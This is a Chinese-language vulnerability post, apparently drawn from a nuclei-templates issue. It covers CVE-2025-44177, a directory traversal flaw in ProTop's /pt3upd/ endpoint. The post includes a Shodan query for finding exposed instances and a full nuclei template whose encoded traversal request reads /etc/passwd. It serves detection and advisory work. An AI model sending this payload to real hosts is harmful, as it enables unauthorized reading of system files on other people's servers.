White Star Software ProTop Directory Traversal Vulnerability

漏洞信息

漏洞名称: White Star Software ProTop Directory Traversal Vulnerability

漏洞编号:

  • CVE: CVE-2025-44177

漏洞类型: 目录遍历

漏洞等级: 高危

漏洞描述: White Star Software ProTop是一款广泛使用的软件,主要用于企业级服务中,提供高效的数据处理和通信功能。其典型部署场景包括企业内部网络和数据中心,因其稳定性和高效性而受到许多企业的青睐。此次发现的目录遍历漏洞存在于ProTop的/pt3upd/端点,影响版本为4.4.2-2024-11-27。漏洞的技术根源在于未能正确处理用户提供的输入,特别是对编码的遍历序列缺乏充分的验证,导致攻击者可以绕过安全限制,访问系统上的任意文件。这种漏洞的存在使得未经身份验证的攻击者能够远程读取底层操作系统上的敏感文件,如/etc/passwd,从而可能导致信息泄露,进一步被利用进行更严重的攻击。由于攻击者无需认证即可利用此漏洞,且攻击可以自动化执行,因此该漏洞的安全风险较高,可能对受影响系统造成严重威胁。

产品厂商: White Star Software

产品名称: ProTop

影响版本: 4.4.2-2024-11-27

搜索语法: html:”ProTop”</p> <p><strong>来源:</strong> <a target="_blank" rel="noopener" href="https://github.com/projectdiscovery/nuclei-templates/blob/a24494c988a3d628025caedd75a539980285350f/http%2Fcves%2F2025%2FCVE-2025-44177.yaml">https://github.com/projectdiscovery/nuclei-templates/blob/a24494c988a3d628025caedd75a539980285350f/http%2Fcves%2F2025%2FCVE-2025-44177.yaml</a></p> <p><strong>类型:</strong> projectdiscovery/nuclei-templates:github issues</p> <h1 id="POC详情"><a href="#POC详情" class="headerlink" title="POC详情"></a>POC详情</h1><figure class="highlight nestedtext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs nestedtext"><br><span class="hljs-attribute">id</span><span class="hljs-punctuation">:</span> <span class="hljs-string">CVE-2025-44177</span><br><br><span class="hljs-attribute">info</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">name</span><span class="hljs-punctuation">:</span> <span class="hljs-string">White Star Software ProTop - Directory Traversal</span><br> <span class="hljs-attribute">author</span><span class="hljs-punctuation">:</span> <span class="hljs-string">s-cu-bot</span><br> <span class="hljs-attribute">severity</span><span class="hljs-punctuation">:</span> <span class="hljs-string">high</span><br> <span class="hljs-attribute">description</span><span class="hljs-punctuation">:</span> <span class="hljs-string">|</span><br> <span class="hljs-attribute">A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.</span><br><span class="hljs-attribute"> remediation</span><span class="hljs-punctuation">:</span> <span class="hljs-string">|</span><br> <span class="hljs-attribute">Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.</span><br><span class="hljs-attribute"> reference</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">https://nvd.nist.gov/vuln/detail/CVE-2025-44177</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">https://client.protop.co.za/</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">https://wss.com/</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d</span><br> <span class="hljs-attribute">classification</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">cvss-metrics</span><span class="hljs-punctuation">:</span> <span class="hljs-string">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N</span><br> <span class="hljs-attribute">cvss-score</span><span class="hljs-punctuation">:</span> <span class="hljs-string">8.2</span><br> <span class="hljs-attribute">cve-id</span><span class="hljs-punctuation">:</span> <span class="hljs-string">CVE-2025-44177</span><br> <span class="hljs-attribute">cwe-id</span><span class="hljs-punctuation">:</span> <span class="hljs-string">CWE-22</span><br> <span class="hljs-attribute">cpe</span><span class="hljs-punctuation">:</span> <span class="hljs-string">cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*</span><br> <span class="hljs-attribute">metadata</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">verified</span><span class="hljs-punctuation">:</span> <span class="hljs-string">true</span><br> <span class="hljs-attribute">max-request</span><span class="hljs-punctuation">:</span> <span class="hljs-string">1</span><br> <span class="hljs-attribute">vendor</span><span class="hljs-punctuation">:</span> <span class="hljs-string">white-star-software</span><br> <span class="hljs-attribute">product</span><span class="hljs-punctuation">:</span> <span class="hljs-string">protop</span><br> <span class="hljs-attribute">shodan-query</span><span class="hljs-punctuation">:</span> <span class="hljs-string">html:"<title>ProTop"</span><br> <span class="hljs-attribute">tags</span><span class="hljs-punctuation">:</span> <span class="hljs-string">cve2025,lfi,traversal,protop</span><br><br><span class="hljs-attribute">http</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">raw:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">|</span><br> <span class="hljs-attribute">GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1</span><br><span class="hljs-attribute"> Host</span><span class="hljs-punctuation">:</span> <span class="hljs-string">{{Hostname}}</span><br><br> <span class="hljs-attribute">matchers-condition</span><span class="hljs-punctuation">:</span> <span class="hljs-string">and</span><br> <span class="hljs-attribute">matchers</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">type: regex</span><br> <span class="hljs-attribute">part</span><span class="hljs-punctuation">:</span> <span class="hljs-string">body</span><br> <span class="hljs-attribute">regex</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'root:.*:0:0:'</span><br><br> <span class="hljs-bullet">-</span> <span class="hljs-string">type: word</span><br> <span class="hljs-attribute">part</span><span class="hljs-punctuation">:</span> <span class="hljs-string">header</span><br> <span class="hljs-attribute">words</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'application/octet-stream'</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">'filename="passwd"'</span><br> <span class="hljs-attribute">condition</span><span class="hljs-punctuation">:</span> <span class="hljs-string">and</span><br><br> <span class="hljs-bullet">-</span> <span class="hljs-string">type: status</span><br> <span class="hljs-attribute">status</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">200</span><br><br><br></code></pre></td></tr></table></figure> </div> <hr/> <div> <div class="post-metas my-3"> <div class="post-meta mr-3 d-flex align-items-center"> <i class="iconfont icon-category"></i> <span class="category-chains"> <span class="category-chain"> <a href="/categories/Github-Poc/" class="category-chain-item">Github Poc</a> </span> </span> </div> <div class="post-meta"> <i class="iconfont icon-tags"></i> <a href="/tags/projectdiscovery-nuclei-templates-github-issues/" class="print-no-link">#projectdiscovery/nuclei-templates:github issues</a> <a href="/tags/%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86/" class="print-no-link">#目录遍历</a> </div> </div> <div class="license-box my-3"> <div class="license-title"> <div>White Star Software ProTop Directory Traversal Vulnerability</div> <div>http://example.com/2025/07/31/github_1503128184/</div> </div> <div class="license-meta"> <div class="license-meta-item"> <div>作者</div> <div>lianccc</div> </div> <div class="license-meta-item license-meta-date"> <div>发布于</div> <div>2025年7月31日</div> </div> <div class="license-meta-item"> <div>许可协议</div> <div> <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/"> <span class="hint--top hint--rounded" aria-label="BY - 署名"> <i class="iconfont icon-cc-by"></i> </span> </a> </div> </div> </div> <div class="license-icon iconfont"></div> </div> <div class="post-prevnext my-3"> <article class="post-prev col-6"> <a href="/2025/07/31/github_2485528139/" title="jsonpath-plus Safe Eval RCE Vulnerability"> <i class="iconfont icon-arrowleft"></i> <span class="hidden-mobile">jsonpath-plus Safe Eval RCE Vulnerability</span> <span class="visible-mobile">上一篇</span> </a> </article> <article class="post-next col-6"> <a href="/2025/07/31/github_556894412/" title="Apache InLong 默认登录凭证漏洞"> <span class="hidden-mobile">Apache InLong 默认登录凭证漏洞</span> <span class="visible-mobile">下一篇</span> <i class="iconfont icon-arrowright"></i> </a> </article> </div> </div> </article> </div> </div> </div> <div class="side-col d-none d-lg-block col-lg-2"> <aside class="sidebar" style="margin-left: -1rem"> <div id="toc"> <p class="toc-header"> <i class="iconfont icon-list"></i> <span>目录</span> </p> <div class="toc-body" id="toc-body"></div> </div> </aside> </div> </div> </div> <a id="scroll-top-button" aria-label="TOP" href="#" role="button"> <i class="iconfont icon-arrowup" aria-hidden="true"></i> </a> <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document"> <div class="modal-content"> <div class="modal-header text-center"> <h4 class="modal-title w-100 font-weight-bold">搜索</h4> <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body mx-3"> <div class="md-form mb-5"> <input type="text" id="local-search-input" class="form-control validate"> <label data-error="x" data-success="v" for="local-search-input">关键词</label> </div> <div class="list-group" id="local-search-result"></div> </div> </div> </div> </div> </main> <footer> <div class="footer-inner"> <div class="footer-content"> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> </div> </div> </footer> <!-- Scripts --> <script src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script> <link rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" /> <script> NProgress.configure({"showSpinner":false,"trickleSpeed":100}) NProgress.start() window.addEventListener('load', function() { NProgress.done(); }) </script> <script src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script> <script src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script> <script src="/js/events.js" ></script> <script src="/js/plugins.js" ></script> <script src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script> <script> (function (window, document) { var typing = Fluid.plugins.typing; var subtitle = document.getElementById('subtitle'); if (!subtitle || !typing) { return; } var text = subtitle.getAttribute('data-typed-text'); typing(text); })(window, document); </script> <script src="/js/img-lazyload.js" ></script> <script> Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() { var toc = jQuery('#toc'); if (toc.length === 0 || !window.tocbot) { return; } var boardCtn = jQuery('#board-ctn'); var boardTop = boardCtn.offset().top; window.tocbot.init(Object.assign({ tocSelector : '#toc-body', contentSelector : '.markdown-body', linkClass : 'tocbot-link', activeLinkClass : 'tocbot-active-link', listClass : 'tocbot-list', isCollapsedClass: 'tocbot-is-collapsed', collapsibleClass: 'tocbot-is-collapsible', scrollSmooth : true, includeTitleTags: true, headingsOffset : -boardTop, }, CONFIG.toc)); if (toc.find('.toc-list-item').length > 0) { toc.css('visibility', 'visible'); } Fluid.events.registerRefreshCallback(function() { if ('tocbot' in window) { tocbot.refresh(); var toc = jQuery('#toc'); if (toc.length === 0 || !tocbot) { return; } if (toc.find('.toc-list-item').length > 0) { toc.css('visibility', 'visible'); } } }); }); </script> <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script> <script>Fluid.plugins.codeWidget();</script> <script> Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() { window.anchors.options = { placement: CONFIG.anchorjs.placement, visible : CONFIG.anchorjs.visible }; if (CONFIG.anchorjs.icon) { window.anchors.options.icon = CONFIG.anchorjs.icon; } var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(','); var res = []; for (var item of el) { res.push('.markdown-body > ' + item.trim()); } if (CONFIG.anchorjs.placement === 'left') { window.anchors.options.class = 'anchorjs-link-left'; } window.anchors.add(res.join(', ')); Fluid.events.registerRefreshCallback(function() { if ('anchors' in window) { anchors.removeAll(); var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(','); var res = []; for (var item of el) { res.push('.markdown-body > ' + item.trim()); } if (CONFIG.anchorjs.placement === 'left') { anchors.options.class = 'anchorjs-link-left'; } anchors.add(res.join(', ')); } }); }); </script> <script> Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() { Fluid.plugins.fancyBox(); }); </script> <script>Fluid.plugins.imageCaption();</script> <script src="/js/local-search.js" ></script> <!-- 主题的启动项,将它保持在最底部 --> <!-- the boot of the theme, keep it at the bottom --> <script src="/js/boot.js" ></script> <noscript> <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div> </noscript> </body> </html>